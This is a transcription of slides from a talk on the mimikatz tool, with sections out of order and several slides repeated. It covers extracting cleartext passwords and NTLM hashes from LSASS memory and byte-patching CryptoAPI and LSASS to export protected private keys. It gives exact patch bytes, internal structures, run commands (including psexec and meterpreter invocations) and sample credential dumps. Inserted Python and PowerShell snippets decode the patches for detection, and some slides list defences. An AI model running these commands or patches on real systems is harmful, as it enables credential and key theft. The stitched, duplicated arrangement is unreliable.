        mod_cryptong::getPrivateKey PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng – because sometimes I own LSASS

This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
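The two listings above (slide 43 for CryptoAPI, slide 49 for CNG) are all a defender needs to understand what "4 bytes" and "1 byte" mean and how to spot such a modification. The following Python is an added example, not mimikatz code and not part of the original slides: it decodes the exact byte sequences shown in the listings (treated here as constructed test data; the addresses are those of the presenter's machine and the module/symbol names are his), shows that the branch targets are preserved because only the opcode bytes change while the displacements stay in place, and diffs a code region against its on-disk counterpart, which is the basic in-memory integrity check that catches this kind of patch in rsaenh.dll or in LSASS.

```python
"""Decode the branch patches from the slides and diff code bytes.

Added example, not mimikatz code.  Addresses and byte strings are copied
from the slide listings and used only as constructed test data.  It shows
why the CAPI patch is 4 bytes and the CNG patch 1 byte, and how comparing a
mapped .text region with the on-disk image reveals the change.
"""
import struct

# Minimal opcode table: just enough to read the listing lines on the slides.
# opcode bytes -> (mnemonic, size of the relative displacement that follows)
_OPCODES = {
    b"\x0f\x85": ("jnz", 4),        # jnz rel32
    b"\xe9":     ("jmp", 4),        # jmp rel32
    b"\x75":     ("jnz short", 1),  # jnz rel8
    b"\xeb":     ("jmp short", 1),  # jmp rel8
    b"\x90":     ("nop", 0),
}


def decode_one(addr, code):
    """Decode the instruction at `addr`; return (mnemonic, length, target).

    A relative branch targets addr + length + displacement.  Putting the nop
    *before* the 5-byte jmp makes the jmp end where the 6-byte jnz ended, so
    the original rel32 can be reused unchanged.
    """
    for opcode, (mnemonic, disp_size) in _OPCODES.items():
        if not code.startswith(opcode):
            continue
        length = len(opcode) + disp_size
        if disp_size == 0:
            return mnemonic, length, None
        fmt = "<b" if disp_size == 1 else "<i"
        (disp,) = struct.unpack(fmt, code[len(opcode):length])
        return mnemonic, length, (addr + length + disp) & 0xFFFFFFFF
    raise ValueError(f"unsupported opcode at {addr:#010x}: {code[:2].hex()}")


def disassemble(addr, code):
    """Decode a whole byte string; returns [(addr, mnemonic, target), ...]."""
    out, off = [], 0
    while off < len(code):
        mnemonic, length, target = decode_one(addr + off, code[off:])
        out.append((addr + off, mnemonic, target))
        off += length
    return out


def branch_targets(addr, code):
    """Only the control-flow targets, in order, for easy comparison."""
    return [t for _, _, t in disassemble(addr, code) if t is not None]


def diff_code(base, on_disk, in_memory):
    """Integrity check: bytes of a mapped code region that differ from the
    on-disk image, as [(address, disk_byte, memory_byte)]."""
    if len(on_disk) != len(in_memory):
        raise ValueError("regions must have the same length")
    return [(base + i, d, m)
            for i, (d, m) in enumerate(zip(on_disk, in_memory)) if d != m]


# Constructed test data: the byte sequences from the slide listings.
CAPI_SITE1 = 0x0AC0B7CB   # rsaenh.dll, first export check (slide 43)
CAPI_SITE2 = 0x0AC1F749   # rsaenh.dll, second export check (slide 43)
CNG_SITE   = 0x6C815210   # CNG export check on the LSASS side (slide 49)

CAPI1_ORIG, CAPI1_PATCHED = bytes.fromhex("0f8533c7ffff"), bytes.fromhex("90e933c7ffff")
CAPI2_ORIG, CAPI2_PATCHED = bytes.fromhex("0f85b63bffff"), bytes.fromhex("90e9b63bffff")
CNG_ORIG,   CNG_PATCHED   = bytes.fromhex("751c"),         bytes.fromhex("eb1c")


def modified_byte_count():
    """Bytes the patches touch: (2 + 2) for CAPI, 1 for CNG."""
    capi = (diff_code(CAPI_SITE1, CAPI1_ORIG, CAPI1_PATCHED)
            + diff_code(CAPI_SITE2, CAPI2_ORIG, CAPI2_PATCHED))
    cng = diff_code(CNG_SITE, CNG_ORIG, CNG_PATCHED)
    return len(capi), len(cng)


if __name__ == "__main__":
    for site, orig, patched in ((CAPI_SITE1, CAPI1_ORIG, CAPI1_PATCHED),
                                (CAPI_SITE2, CAPI2_ORIG, CAPI2_PATCHED),
                                (CNG_SITE, CNG_ORIG, CNG_PATCHED)):
        before = [f"{t:#010x}" for t in branch_targets(site, orig)]
        after = [f"{t:#010x}" for t in branch_targets(site, patched)]
        print(f"{site:#010x}: targets {before} -> {after}")
        for a, d, m in diff_code(site, orig, patched):
            print(f"  byte at {a:#010x} changed {d:#04x} -> {m:#04x}")
    print("modified bytes (capi, cng):", modified_byte_count())
```

Run stand-alone, the script reports that every branch target is identical before and after the patch and that exactly two bytes change per CAPI site and one byte at the CNG site. In a real check the `on_disk` bytes come from the module file's .text section relocated to the load address, and the `in_memory` bytes from the live process; a non-empty result on a system DLL that has no legitimate hot-patching is worth an alert.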
mimikatz :: crypto :: patchcng – demo time

Import, export, import as not exportable... export again.
mimikatz :: crypto :: patchcng – limitations

Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz :: crypto :: patchcng – bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX
La commande s'est terminée correctement.
mimikatz :: crypto – memo

Some commands
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE \"Remote Desktop\""
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto – what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts / the computer – no admin, no admin, no admin...

Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz – what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– ...
...
mimikatz – that's all folks

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention

Questions?
Don't be shy ;)
...especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: livessp – workflow

[Diagram, slide 25: LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList → search linked list for LUID → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos

Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
Call stacks reaching LsaProtectMemory (innermost frame first):
  lsasrv!LsaProtectMemory ← kerberos!KerbHideKey ← kerberos!KerbCreatePrimaryCredentials ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← kerberos!KerbHidePassword ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← msv1_0!NlpAddPrimaryCredential ← msv1_0!SspAcceptCredentials ← msv1_0!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← wdigest!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← tspkg!TSHidePassword ← tspkg!SpAcceptCredentials

Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) – workflow

[Diagram, slide 28: LsaEnumerateLogonSessions → for each LUID → kerberos!KerbGlobalLogonSessionTable → RtlLookupElementGenericTableAvl → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) – workflow

[Diagram, slide 29: LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList → search linked list for LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa – demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos – "hu?"

Ok, it works...
But why?
Not at every logon on NT5 (it can need an unlock)

From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol...
– all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logical...
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
  – NTLM hash on client...
  – the KDC sent it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, so they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory – NT5

Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx

[Diagram, slide 33: the lsasrv keys inside lsass (g_cbRandomKey: DWORD = 256; g_pRandomKey: BYTE[g_cbRandomKey]; g_pDESXKey: BYTE[144]; g_Feedback: BYTE[8]) are copied into mimikatz, which loads lsasrv itself and calls LsaUnprotectMemory]
mimikatz :: sekurlsa :: LsaEncryptMemory – NT6

Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES

[Diagram, slide 34: the lsasrv keys inside lsass (InitializationVector: BYTE[16]; h3DesKey; hAesKey, both pointing to KIWI_BCRYPT_KEY / KIWI_BCRYPT_KEY_DATA) are copied into mimikatz]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data;   /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa – memo

Security Packages

Package         Symbols                                 Type
tspkg           tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                   LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList                 LIST_ENTRY
                lsasrv!LogonSessionListCount            ULONG

Protection Keys

Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa – memo

Some commands
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp :
         n.t. (LUID KO)
mimikatz :: sekurlsa – what we can do

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts: network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto – what is it?

A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))

mod_mimikatz_crypto
mimikatz :: crypto – how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
(Password and popup: a constraint for most users, unavailable for computer keys)

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi – how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi :: how it's exported (… level)

[Diagram: the process calls CryptoAPI and the RSA CSP; "Ask to export Key" → DPAPI decode (labelled "PLAYSKOOL") → Load Private Key → Exportable? yes → Exported Key; no → NTE_BAD_KEY_STATE]
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(slide annotation on "Exportabilité : NON": Exportable)
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space (two bytes at each of the two sites below: the 0F 85 opcode of the conditional jnz becomes 90 E9, a nop followed by an unconditional jmp that keeps the same rel32 displacement):

.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations

Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not performed in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported (… level)

[Diagram: the process calls CNG, which goes over RPC to the KeyIso service hosted in the LSASS process (an NT6 system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP); "Ask to export Key" → DPAPI decode (labelled "PLAYSKOOL") → Load Private Key → Exportable? yes → Exported Key; no → NTE_NOT_SUPPORTED]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys [user]
Clés CNG :
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.

(slide annotation on "Exportabilité : NON": Exportable)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time, the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space… (the 75 opcode of the short conditional jnz becomes EB, a short unconditional jmp with the same rel8 displacement):

.text:6C815210  75 1C    jnz  short continue_key_export
.text:6C815210  EB 1C    jmp  short continue_key_export
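The two listings above (rsaenh, slide "because I own my process", and ncrypt, this slide) only make sense once you see that an x86 relative branch is measured from the end of the instruction. As an added example, not code from the talk or from mimikatz, this PowerShell decodes exactly the bytes printed on the slides and checks that each patched sequence keeps the instruction size and lands on the same target; the function names are mine and only the opcodes that appear on the slides are handled.

```powershell
# Added example, not mimikatz code: decode the branch instructions from the two
# patch listings and verify size preservation and identical branch targets.
function ConvertTo-SignedByte([byte]$Value) {
    # rel8 displacements are signed; PowerShell refuses [sbyte]255, so fold by hand.
    if ($Value -gt 127) { [int]$Value - 256 } else { [int]$Value }
}

function Get-BranchTarget {
    param([int64]$Address, [byte[]]$Bytes)
    switch ($Bytes[0]) {
        0x75 { $mn = 'jnz short'; $len = 2; $disp = ConvertTo-SignedByte $Bytes[1]; break }
        0xEB { $mn = 'jmp short'; $len = 2; $disp = ConvertTo-SignedByte $Bytes[1]; break }
        0xE9 { $mn = 'jmp near';  $len = 5; $disp = [BitConverter]::ToInt32($Bytes, 1); break }
        0x0F {
            if ($Bytes[1] -ne 0x85) { throw ('unsupported opcode 0F {0:X2}' -f $Bytes[1]) }
            $mn = 'jnz near'; $len = 6; $disp = [BitConverter]::ToInt32($Bytes, 2); break
        }
        default { throw ('unsupported opcode {0:X2}' -f $Bytes[0]) }
    }
    # The displacement is relative to the end of the instruction: a 6-byte jnz rel32
    # and a 1-byte nop followed by a 5-byte jmp rel32 end at the same address, so the
    # same displacement reaches the same target.
    [pscustomobject]@{ Mnemonic = $mn; Length = $len; Target = ($Address + $len + $disp) }
}

function Compare-BranchPatch {
    param([int64]$Address, [byte[]]$Original, [byte[]]$Patched)
    if ($Original.Length -ne $Patched.Length) { throw 'an in-place patch must keep the instruction size' }
    $before = Get-BranchTarget -Address $Address -Bytes $Original
    # Skip any nop (0x90) padding that precedes the replacement jmp.
    $pad = 0
    while ($Patched[$pad] -eq 0x90) { $pad++ }
    $after = Get-BranchTarget -Address ($Address + $pad) -Bytes $Patched[$pad..($Patched.Length - 1)]
    $changed = 0
    for ($i = 0; $i -lt $Original.Length; $i++) { if ($Original[$i] -ne $Patched[$i]) { $changed++ } }
    [pscustomobject]@{
        Address      = '0x{0:X8}' -f $Address
        Before       = $before.Mnemonic
        After        = $(if ($pad) { "nop x$pad + $($after.Mnemonic)" } else { $after.Mnemonic })
        SameTarget   = ($before.Target -eq $after.Target)
        Target       = '0x{0:X8}' -f $before.Target
        BytesChanged = $changed
    }
}

# Bytes exactly as printed on the slides: two sites in rsaenh.dll (CryptoAPI)
# and one site in ncrypt inside lsass (CNG).
$sites = @(
    @{ Address = 0x0AC0B7CB; Before = 0x0F,0x85,0x33,0xC7,0xFF,0xFF; After = 0x90,0xE9,0x33,0xC7,0xFF,0xFF },
    @{ Address = 0x0AC1F749; Before = 0x0F,0x85,0xB6,0x3B,0xFF,0xFF; After = 0x90,0xE9,0xB6,0x3B,0xFF,0xFF },
    @{ Address = 0x6C815210; Before = 0x75,0x1C;                     After = 0xEB,0x1C }
)
$results = foreach ($s in $sites) {
    Compare-BranchPatch -Address $s.Address -Original ([byte[]]$s.Before) -Patched ([byte[]]$s.After)
}
$results | Format-Table -AutoSize
'rsaenh.dll bytes changed : {0}' -f (($results[0..1] | Measure-Object -Property BytesChanged -Sum).Sum)
'ncrypt bytes changed     : {0}' -f $results[2].BytesChanged
```

The same decoder can be pointed at any other conditional branch of the two supported shapes; it reports the change count, which is what the "4" and "1" on the slides refer to.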
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations

The patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil!

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo

Some commands
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # exit

